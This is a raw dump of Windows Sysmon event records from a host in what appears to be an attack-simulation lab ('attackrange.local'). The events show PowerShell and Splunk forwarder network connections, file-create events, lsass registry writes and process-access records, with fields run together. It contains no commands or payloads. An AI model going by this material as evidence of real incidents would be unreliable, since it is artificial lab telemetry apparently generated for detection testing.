disk space 354300x800000000000000035083381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:31.066{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56471-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:06.138{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=41D15877E61574D274BD5BD6B5344200,SHA256=25E90E79AD82CE3502C684D11D725F79EB01C0706AB36B72F2227A099EF045AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:06.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BED036926861D6A4D0C277BEC45E163,SHA256=4BC37BC03D2BB4E704951ADE82A3B14A9BB6C401DB4EA644135F1252EBB33613,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:07.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBDD32A6F0A017F2ADC1EB51E3E7612,SHA256=B0920AA0408096CC4EAB6986A80C44F156A03C219AF86C2022FF50627B844637,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:32.018{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56472-false10.0.1.12-8000- 23542300x800000000000000035083383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:08.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E498B73DCE8B380918D58F39AD51EB11,SHA256=215B4D43AD206DA68881183E7506969E67AA2E3BD4ABAF0825EAF488FF72DA59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:09.168{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EBF4DF99C63D49524C05F5AFE9D96C,SHA256=4DFF57BDF13D6161EF51E4304CC21FA760DBB62A373660269845F1DFF47F1EF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035083396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 
18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035083395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717a531e) 13241300x800000000000000035083394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59c-0xd9557678) 13241300x800000000000000035083393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0x3b19de78) 13241300x800000000000000035083392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ad-0x9cde4678) 13241300x800000000000000035083391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035083390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 
18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717a531e) 13241300x800000000000000035083389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59c-0xd9557678) 13241300x800000000000000035083388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0x3b19de78) 13241300x800000000000000035083387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ad-0x9cde4678) 23542300x800000000000000035083386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:10.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9190BB57BBFD92356CF15D2E0EFB48,SHA256=D2A136C39A777FA76C1B9970F632B8A8FCC4FCEB3233E6BCC13683641C9C9AF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:11.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB62D36B2D78C7E74B5B3AB465A33D67,SHA256=34B9F4C13696AA408BBD071A502A6971F5919E12F2F9693BFE9DB360D067D452,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:11.119{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=68CE814CCF5E3EC096359E31625E50F5,SHA256=50BA06E686505B398D7A1D6BCAA8972F16BFDEF3B5590538725AFDAF0FFB3512,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:12.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5276D405A2479AA9A7398454A6C35DBD,SHA256=C0A4A91C7DB1B173F386536B303B6E1066F324398A46D49D2832AB4CB1E9E019,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:36.078{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56473-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035083411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.588{B81B27B7-4CD9-613A-0F90-03000000C801}45602812C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:13.386{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.381{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=743976A6E0D3BDE5B38B86890EB32095,SHA256=402261901945ADC766AF0F1DBF480E2D9CD2C296880741A7A6403AAD8868B126,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:37.077{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56474-false10.0.1.12-8000- 23542300x800000000000000035083422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=795DB499E27C033CFBA036492BC645C5,SHA256=A64402693DF73FB84C00DD1946F1B2DD939249528257CA9C8BBAD84DFBAFAE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0B4A001CECB78EC6862B9988C0CFA84,SHA256=0AA7D6052E66108C4D887B67896B143D39A1C8132C7AC7F68F35FC5E32B2D306,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFB4671832566D5C49B8B35DF2D52AF1,SHA256=98D4894164DAFDBFF752F2C53E12A3BA5B7D4BD48B6AC3B83DB3BE8876D09B7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.084{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:14.082{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.082{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:14.081{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.081{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:14.081{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.081{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 